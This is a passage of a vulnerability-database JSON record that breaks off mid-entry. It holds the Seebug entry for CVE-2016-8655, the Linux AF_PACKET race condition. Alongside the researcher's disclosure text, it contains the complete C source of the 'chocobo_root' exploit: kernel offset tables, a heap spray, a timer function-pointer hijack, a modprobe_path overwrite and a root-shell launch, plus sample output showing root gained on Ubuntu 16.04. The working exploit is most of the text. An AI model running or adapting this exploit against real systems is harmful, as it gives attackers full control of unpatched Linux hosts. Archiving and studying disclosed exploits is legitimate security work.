products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-11-19T19:06:00", "published": "2018-03-14T22:32:00", "id": "F5:K44309215", "href": "https://support.f5.com/csp/article/K44309215", "title": "Linux kernel vulnerability CVE-2017-1000111", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:37", "description": "To create AF_PACKET sockets you need CAP_NET_RAW in your network\r\nnamespace, which can be acquired by unprivileged processes on\r\nsystems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc).\r\nIt can be triggered from within containers to compromise the host kernel.\r\nOn Android, processes with gid=3004/AID_NET_RAW are able to create\r\nAF_PACKET sockets (mediaserver) and can trigger the bug.\r\n\r\nI found the bug by reading code paths that have been opened up by the\r\nemergence of unprivileged namespaces, something I think should be\r\noff by default in all Linux distributions given its history of\r\nsecurity vulnerabilities.\r\n\r\nThe problem is inside packet_set_ring() and packet_setsockopt().\r\nWe can reach packet_set_ring() by calling setsockopt() on the socket\r\nusing the PACKET_RX_RING option.\r\n\r\nIf the version of the packet socket is TPACKET_V3, a timer_list\r\nobject will be initialized by packet_set_ring() when it calls\r\ninit_prb_bdqc().\r\n```\r\n...\r\n switch (po->tp_version) {\r\n case TPACKET_V3:\r\n /* Transmit path is not supported. We checked\r\n * it above but just being paranoid\r\n */\r\n if (!tx_ring)\r\n init_prb_bdqc(po, rb, pg_vec, req_u);\r\n break;\r\n default:\r\n break;\r\n }\r\n...\r\n```\r\nThe function flow to set up the timer is:\r\npacket_set_ring()->init_prb_bdqc()->prb_setup_retire_blk_timer()->\r\nprb_init_blk_timer()->prb_init_blk_timer()->init_timer()\r\n\r\nWhen the socket is closed, packet_set_ring() is called again\r\nto free the ring buffer and delete the previously initialized\r\ntimer if the packet version is > TPACKET_V2:\r\n\r\n```\r\n...\r\n if (closing && (po->tp_version > TPACKET_V2)) {\r\n /* Because we don't support block-based V3 on tx-ring */\r\n if (!tx_ring)\r\n prb_shutdown_retire_blk_timer(po, rb_queue);\r\n }\r\n...\r\n```\r\n\r\nThe issue is that we can change the packet version to TPACKET_V1\r\nwith packet_setsockopt() after init_prb_bdqc() has been executed\r\nand before packet_set_ring() has returned.\r\n\r\nThere is an attempt to deny changing socket versions after a ring\r\nbuffer has been initialized, but it is insufficient:\r\n```\r\n...\r\n case PACKET_VERSION:\r\n {\r\n...\r\n if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)\r\n return -EBUSY;\r\n...\r\n```\r\nThere's plenty of room to race this code path between the calls to\r\ninit_prb_bdqc() and swap(rb->pg_vec, pg_vec) in packet_set_ring().\r\n\r\nWhen the socket is closed, packet_set_ring() will not delete the\r\ntimer since the socket version is now TPACKET_V1. The struct\r\ntimer_list that describes the timer object is located inside the\r\nstruct packet_sock for the socket itself however and will be\r\nfreed with a call to kfree().\r\n\r\nWe then have a use-after-free on a timer object that can be\r\nexploited by various poisoning attacks on the SLAB allocator (I find\r\nadd_key() to be the most reliable). This will ultimately lead to the\r\nkernel jumping to a manipulated function pointer when the timer expires.\r\n\r\nThe bug is fixed by taking lock_sock(sk) in packet_setsockopt() when\r\nchanging the packet version while also taking the lock at the start\r\nof packet_set_ring().\r\n\r\nMy exploit defeats SMEP/SMAP and will give a rootshell on Ubuntu 16.04,\r\nI will hold off a day on publishing it so people have some time to update.\r\n\r\nNew Ubuntu kernels are out so please update as soon as possible.\r\n\r\n=*=*=*=*=*=*=*=*= TIMELINE =*=*=*=*=*=*=*=*=\r\n```\r\n2016-11-28: Bug reported to security () kernel org\r\n2016-11-30: Patch submitted to netdev, notification sent to linux-distros\r\n2016-12-02: Patch committed to mainline kernel\r\n2016-12-06: Public announcement\r\n```", "published": "2016-12-07T00:00:00", "type": "seebug", "title": "Linux af_packet.c race condition (local root) (CVE-2016-8655)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92567", "id": "SSV:92567", "sourceData": "\n /*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n \r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n \r\n \r\nstage 1 completed\r\nregistering new sysctl..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n \r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n \r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n \r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n \r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n \r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n \r\n11/2016\r\nby rebel\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n \r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n \r\n \r\nstruct offset *off = NULL;\r\n \r\n//99% of these offsets haven't actually been tested :)\r\n \r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic #68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n {\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic #37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic #62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n \r\n#define VSYSCALL 0xffffffffff600000\r\n \r\n#define PAD 64\r\n \r\nint pad_fds[PAD];\r\n \r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n \r\n#define CONF_RING_FRAMES 1\r\n \r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n \r\n while(barrier) {}\r\n \r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n y++;\r\n \r\n if(x != 0) break;\r\n \r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n if(x != 0) break;\r\n \r\n y++;\r\n }\r\n \r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n \r\n \r\n return NULL;\r\n}\r\n \r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n \r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n \r\n \r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n \r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n}\r\n \r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n \r\n sigemptyset(&set);\r\n \r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n \r\n pad_kmalloc();\r\n \r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n \r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n pad_kmalloc();\r\n \r\n fprintf(stderr,\"sockets allocated\\n\");\r\n \r\n val = TPACKET_V3;\r\n \r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n \r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n \r\n sfd = fd;\r\n \r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n \r\n \r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n \r\n usleep(200000);\r\n \r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n \r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n \r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n \r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n \r\n \r\n barrier = 0;\r\n \r\n usleep(100000);\r\n \r\n while(!vers_switcher_done)usleep(100000);\r\n \r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n \r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n \r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n \r\n \r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n \r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n \r\n \r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n \r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n \r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n \r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n \r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n \r\n close(sfd);\r\n \r\n kmalloc();\r\n \r\n fprintf(stderr,\"all messages sent\\n\");\r\n \r\n sleep(31337);\r\n exit(1);\r\n}\r\n \r\n \r\nint verification_result = 0;\r\n \r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n \r\n \r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n \r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n signal(SIGSEGV, catch_sigsegv);\r\n \r\n *vsyscall = 0xdeadbeef+x;\r\n \r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n \r\n pthread_join(v_thread, NULL);\r\n \r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not modify vsyscall\\n\");\r\n \r\n exit(1);\r\n}\r\n \r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n \r\n \r\n}\r\n \r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n \r\nretry:\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n \r\n wait(&status);\r\n \r\n printf(\"\\n\");\r\n \r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n \r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n \r\n \r\n \r\n kill(pid, 9);\r\n}\r\n \r\n \r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n \r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n \r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n \r\n printf(\"\\nstage 1 completed\\n\");\r\n \r\n sleep(5);\r\n \r\n printf(\"registering new sysctl..\\n\\n\");\r\n \r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n \r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n \r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n \r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n \r\n printf(\"stage 2 completed\\n\");\r\n}\r\n \r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n \r\n \r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n \r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n \r\n memset(buf,'\\x00', 256);\r\n \r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n \r\n write(fd,buf,strlen(buf)+1);\r\n \r\n socket(AF_INET,SOCK_STREAM,132);\r\n \r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n \r\n else\r\n printf(\"could not create rootshell\\n\");\r\n \r\n \r\n}\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n \r\n \r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n \r\n \r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n \r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n \r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n \r\n uname(&u);\r\n \r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n \r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n \r\n printf(\"kernel version: %s\\n\",buf);\r\n \r\n \r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n \r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n \r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n \r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n \r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n \r\n wrapper();\r\n exit(0);\r\n }\r\n \r\n waitpid(pid, &status, 0);\r\n \r\n launch_rootshell();\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92567"}], "fedora": [{"lastseen": 